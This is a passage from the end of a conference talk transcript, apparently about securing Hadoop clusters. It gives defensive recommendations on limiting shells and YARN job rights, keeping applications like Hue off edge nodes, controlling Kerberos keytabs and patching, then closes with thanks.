and also the data itself, so you have to reduce that exposure. Then, don't give out free shells: if a data scientist does not have the right to launch their own YARN jobs, do not allow them to do it. Then, application deployment: do not deploy applications on edge nodes — for example Hue, which, as you have seen, is affected by vulnerabilities. Then, try to prevent and detect the misuse of Kerberos keytabs; it's very important, because we have seen a lot of Kerberized clusters with lots of keytabs available to everyone. And then, try to harden — I think this is the most difficult recommendation — try to harden the components and keep your cluster up to date.

Keeping up to date will be a challenge, because it's a big task, but you have to do it. So thank you, that's all from us. Thank you for being here — don't hesitate to give us your feedback and to continue the discussion with us. Thank you. [Applause]